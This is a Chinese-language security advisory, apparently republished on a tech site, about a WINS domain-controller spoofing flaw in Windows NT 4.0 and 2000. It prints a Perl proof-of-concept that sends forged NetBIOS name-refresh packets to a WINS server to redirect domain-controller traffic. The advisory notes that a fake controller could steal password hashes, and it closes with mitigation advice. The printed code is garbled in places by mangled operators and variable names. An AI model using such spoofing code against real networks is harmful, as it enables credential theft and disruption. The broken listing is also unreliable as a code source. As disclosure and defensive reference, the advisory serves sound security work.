Microsoft WINS之域控制器欺骗漏洞

运维 系统运维
本文介绍了微软系统中受影响的系统出现域控制器欺骗漏洞进行测试的方法。

Microsoft WINS之域控制器欺骗漏洞如下所述:

受影响系统:

Microsoft Windows NT 4.0

Microsoft Windows NT 2000 Server

描述:

BUGTRAQ ID :2221

Windows Internet名字服务(WINS)随着微软Windows NT服务器分发。WINS负责在一个客户-服务器的环境中将网络计算机名解析为IP地址。

然而,WINS没有正确验证域控制器的注册。用户可能修改一个域控制器的内容,导致WINS服务将发往域控制器的请求重定向到另一个系统。这可能导致该域的网络功能失效。冒牌的域控制器也可以被设置来窃取用户名和口令的哈希值。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

David Byrne (dbyrne@tiaa-cref.org)提供了一个测试程序wins2.pl:

###########################################################################

 

  1. use Socket;  
  2.  
  3. $WINSAddress = "XXX.XXX.XXX.XXX"; #IP Address or Host/NetBIOS name  
  4.  
  5. $DomainName = "AAADUMMY"; #Must be all caps  
  6.  
  7. $SequenceNumber = 0x8000;  
  8.  
  9. socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "Socket not created $!\n";  
  10.  
  11. $destAddress = inet_aton($WINSAddress);  
  12.  
  13. $destPort = sockaddr_in(137, $destAddress);  
  14.  
  15. for ($i=1;$i<=25; $i++)  
  16.  
  17. {SendRefresh ($DomainName, 0x1C, "\x0a\x6a\x00" . chr ($i))}  
  18.  
  19. sub Sequence  
  20.  
  21. {  
  22.  
  23. my ($high, $low, $str);  
  24.  
  25. $high = $SequenceNumber >> 8;  
  26.  
  27. $low = $SequenceNumber % 256;  
  28.  
  29. $SequenceNumber += 2;  
  30.  
  31. $str = chr($high) . chr ($low);  
  32.  
  33. return $str;  
  34.  
  35. }  
  36.  

 

#p#

 

  1. sub SendRelease  
  2.  
  3. {  
  4.  
  5. my ($tempname, $data);  
  6.  
  7. $tempname = NetBIOSName ($_[0], $_[1]);  
  8.  
  9. $data = Sequence () . "\x30\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x00\x00\x00\x00\x06\x20\x00" . $_[2];  
  10.  
  11. send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";  
  12.  
  13. }  
  14.  
  15. sub SendRefresh  
  16.  
  17. {  
  18.  
  19. my ($tempname, $data);  
  20.  
  21. $tempname = NetBIOSName ($_[0], $_[1]);  
  22.  
  23. $data = Sequence () . "\x29\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x04\x93\xe0\x00\x06\xe0\x00" . $_[2];  
  24.  
  25. send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";  
  26.  
  27. }  
  28.  
  29. sub NetBIOSName  
  30.  
  31. {  
  32.  
  33. my ($c, $ord, $high, $low, $tempname);  
  34.  
  35. while ($_[0] =~ /(.)/g)  
  36.  
  37. {  
  38.  
  39. $c++;  
  40.  
  41. $ordord = ord ($1);  
  42.  
  43. $high = $ord >> 4;  
  44.  
  45. $low = $ord % 16;  
  46.  
  47. $tempname .chr($high +65) . chr($low +65);  
  48.  
  49. }  
  50.  
  51. for (;$c<15;$c++)  
  52.  
  53. {$tempname ."\x43\x41"}  
  54.  
  55. $high = $_[1] >> 4;  
  56.  
  57. $low = $_[1] % 16;  
  58.  
  59. $tempname .chr($high +65) . chr($low +65);  
  60.  
  61. return $tempname;  
  62.  
  63. }  
  64.  

 

建议:

临时解决方法:

NSFOCUS建议您采用David Byrne提供的临时解决方法:对于敏感信息,采用静态记录。并在防火墙的DMZ区封锁NetBIOS服务。

Microsoft WINS域控制器欺骗漏洞的介绍希望能够对读者有所帮助。

【编辑推荐】

  1. 域控制器迁移的方法
  2. 域控制器降级基础知识
  3. 域控制器千万别忽视DNS设置
  4. 域控制器的安装及降级的方法
  5. windows2003域控制器升级和降级的图文教程
责任编辑:韩亚珊 来源: 比特网
相关推荐

2011-07-12 09:29:10

主域控制器备份域控制器

2011-07-13 10:29:44

域控制器

2011-07-14 10:28:54

额外域控制器

2011-07-08 17:58:56

域控制器

2011-07-18 14:17:07

域控制器组策略OU

2011-07-18 13:55:08

2011-07-07 15:01:02

2011-07-07 17:15:52

2011-07-12 09:58:42

主域控制器备份域控制器

2022-02-10 16:43:35

汽车智能芯片

2011-07-08 13:56:00

域控制器服务器

2011-07-14 08:49:16

域控制器

2011-07-13 10:56:04

2011-07-13 13:13:10

域控制器活动目录

2011-07-07 09:10:17

域控制器降级Active Dire

2011-07-13 10:01:16

域控制器

2011-07-06 17:29:33

域控制器域控制器迁移

2011-07-28 10:38:35

域控制器

2011-07-20 09:01:33

域控制器ntp服务器

2011-07-13 09:00:59

域控制器Active Dire
点赞
收藏

51CTO技术栈公众号